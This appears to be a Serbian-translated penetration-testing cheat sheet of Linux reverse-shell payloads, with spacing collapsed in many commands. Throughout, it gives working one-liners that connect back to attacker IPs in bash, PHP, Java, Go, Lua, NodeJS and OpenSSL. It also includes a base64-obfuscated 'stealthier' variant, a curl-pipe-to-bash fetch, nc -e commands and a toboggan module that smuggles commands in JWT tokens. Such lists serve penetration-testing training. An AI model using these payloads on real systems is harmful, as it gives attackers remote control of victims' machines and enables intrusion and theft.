curlhttps://reverse-shell.sh/1.1.1.1:3000|bashbash-i>&/dev/tcp/<ATTACKER-IP>/<PORT>0>&1bash-i>&/dev/udp/127.0.0.1/42420>&1#UDP0<&196;exec196<>/dev/tcp/<ATTACKER-IP>/<PORT>; sh<&196>&1962>&196exec5<>/dev/tcp/<ATTACKER-IP>/<PORT>; whilereadline0<&5; do $line 2>&5>&5; done#Short and bypass (credits to Dikline)(sh)0>/dev/tcp/10.10.10.10/9091#after getting the previous shell to get the output to executeexec>&0
Simbol bezbedna ljuska
Ne zaboravite da proverite i sa drugim ljuskama: sh, ash, bsh, csh, ksh, zsh, pdksh, tcsh i bash.
#If you need a more stable connection do:bash-c'bash -i >& /dev/tcp/<ATTACKER-IP>/<PORT> 0>&1'#Stealthier method#B64 encode the shell like: echo "bash -c 'bash -i >& /dev/tcp/10.8.4.185/4444 0>&1'" | base64 -w0echobm9odXAgYmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjQuMTg1LzQ0NDQgMD4mMScK|base64-d|bash2>/dev/null
Objasnjenje Shell-a
bash -i: Ovaj deo komande pokreće interaktivnu (-i) Bash ljusku.
>&: Ovaj deo komande je skraćena oznaka za preusmeravanje kako standardnog izlaza (stdout) tako i standardne greške (stderr) na isti odredište.
/dev/tcp/<IP-NAPADACA>/<PORT>: Ovo je poseban fajl koji predstavlja TCP konekciju ka navedenoj IP adresi i portu.
Preusmeravanjem izlaznih i grešnih tokova u ovaj fajl, komanda efikasno šalje izlaz interaktivne ljuske sesije ka računaru napadača.
0>&1: Ovaj deo komande preusmerava standardni ulaz (stdin) na isto odredište kao standardni izlaz (stdout).
Kada se suočite sa ranjivošću Udaljenog izvršenja koda (RCE) unutar veb aplikacije zasnovane na Linuxu, postizanje reverzne ljuske može biti otežano zbog mrežnih odbrana poput iptables pravila ili složenih mehanizama filtriranja paketa. U takvim ograničenim okruženjima, alternativni pristup uključuje uspostavljanje PTY (Pseudo Terminal) ljuske kako biste efikasnije interagirali sa kompromitovanim sistemom.
Preporučeni alat za tu svrhu je toboggan, koji pojednostavljuje interakciju sa ciljnim okruženjem.
Da biste efikasno koristili toboggan, kreirajte Python modul prilagođen RCE kontekstu vašeg ciljnog sistema. Na primer, modul nazvan nix.py može biti struktuiran na sledeći način:
import jwt
import httpx
def execute(command: str, timeout: float = None) -> str:
# Generate JWT Token embedding the command, using space-to-${IFS} substitution for command execution
token = jwt.encode(
{"cmd": command.replace(" ", "${IFS}")}, "!rLsQaHs#*&L7%F24zEUnWZ8AeMu7^", algorithm="HS256"
)
response = httpx.get(
url="https://vulnerable.io:3200",
headers={"Authorization": f"Bearer {token}"},
timeout=timeout,
# ||BURP||
verify=False,
)
# Check if the request was successful
response.raise_for_status()
return response.text
I onda možete pokrenuti:
toboggan-mnix.py-i
Da biste direktno iskoristili interaktivnu ljusku, možete dodati -b za integraciju sa Burpsuite-om i ukloniti -i za osnovniji rce omotač.
Način slanja payload-a (zaglavlja? podaci? dodatne informacije?)
Zatim možete jednostavno slati komande ili čak koristiti komandu upgrade da biste dobili potpunu PTY (imajte na umu da se cevi čitaju i pišu sa oko 1.3s kašnjenja).
// Using 'exec' is the most common method, but assumes that the file descriptor will be 3.// Using this method may lead to instances where the connection reaches out to the listener and then closes.php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'// Using 'proc_open' makes no assumptions about what the file descriptor will be.// See https://security.stackexchange.com/a/198944 for more information<?php $sock=fsockopen("10.0.0.1",1234);$proc=proc_open("/bin/sh -i",array(0=>$sock,1=>$sock,2=>$sock), $pipes); ?><?php exec("/bin/bash -c 'bash -i >/dev/tcp/10.10.14.8/4444 0>&1'"); ?>
Java
r=Runtime.getRuntime()p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","192.168.0.134:8080");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go
Lua
#Linuxlua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"
#Windows & Linuxlua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
NodeJS
(function(){var net =require("net"),cp =require("child_process"),sh =cp.spawn("/bin/sh", []);var client =newnet.Socket();client.connect(8080,"10.17.26.64",function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});return /a/; // Prevents the Node.js application form crashing})();orrequire('child_process').exec('nc -e /bin/sh [IPADDR] [PORT]')require('child_process').exec("bash -c 'bash -i >& /dev/tcp/10.10.14.2/6767 0>&1'")or-var x =global.process.mainModule.require-x('child_process').exec('nc [IPADDR] [PORT] -e /bin/bash')or// If you get to the constructor of a function you can define and execute another function inside a string"".sub.constructor("console.log(global.process.mainModule.constructor._load(\"child_process\").execSync(\"id\").toString())")()
"".__proto__.constructor.constructor("console.log(global.process.mainModule.constructor._load(\"child_process\").execSync(\"id\").toString())")()
or// Abuse this syntax to get a reverse shellvar fs =this.process.binding('fs');var fs =process.binding('fs');orhttps://gitlab.com/0x4ndr3/blog/blob/master/JSgen/JSgen.py
OpenSSL
Napadač (Kali)
opensslreq-x509-newkeyrsa:4096-keyoutkey.pem-outcert.pem-days365-nodes#Generate certificateopenssls_server-quiet-keykey.pem-certcert.pem-port<l_port>#Here you will be able to introduce the commandsopenssls_server-quiet-keykey.pem-certcert.pem-port<l_port2>#Here yo will be able to get the response